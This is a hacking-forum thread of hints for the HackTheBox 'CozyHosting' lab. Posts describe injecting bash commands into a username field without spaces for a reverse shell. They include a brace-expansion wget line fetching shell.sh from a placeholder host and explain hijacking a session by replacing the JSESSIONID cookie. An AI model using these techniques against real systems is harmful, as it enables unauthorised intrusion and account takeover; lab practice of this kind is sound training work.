HTB - CozyHosting
by soulmate - Sunday September 3, 2023 at 01:12 AM
#11
(Sep 03, 2023, 02:40 PM)PENGANLI001 Wrote: every valid hostname
I first though is app-shell can read the app-/etc/hosts/
127.0.0.1 localhost cozyhosting cozyhosting.htb
127.0.1.1 cozycloud

# The following lines are desirable for IPv6 capable hosts
::1    ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

but it seem like the my machine IP still work

OK I will read the https://portswigger url
thank you

Try injecting some bash command into the username field, find a way to avoid using spaces in commands and you can have your revshell
Reply
#12
user is so difficult
Reply
#13
still stuck on the admin page.... no redirect on localhost bcus error, wth??
Reply
#14
(Sep 03, 2023, 03:08 PM)flagbot Wrote: still stuck on the admin page.... no redirect on localhost bcus error, wth??

that's weird, is it etc host file problem?
Reply
#15
Rooted, if someone need help, he can ask
Reply
#16
you can actually enter a command with arguments with no spaces
{wget,http://ip/shell.sh,-P,/tmp/}
Reply
#17
Found the user kanderson but Idk how to login with the cookie. Any help plz?
Reply
#18
(Sep 03, 2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?

open browser devtools go to storage find your cookie replace with new cookie then refresh
Reply
#19
(Sep 03, 2023, 08:07 PM)9xEntEr Wrote:
(Sep 03, 2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?

open browser devtools go to storage find your cookie replace with new cookie then refresh

If using burp you can replace the JSESSIONID with it as well
Reply
#20
(Sep 03, 2023, 08:55 PM)grisey Wrote: Any tips about getting to user josh\root?

looks to postgresql
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,783 4 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,504 9 hours ago
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,211 Yesterday, 02:10 PM
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,525 Apr 29, 2026, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 414 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)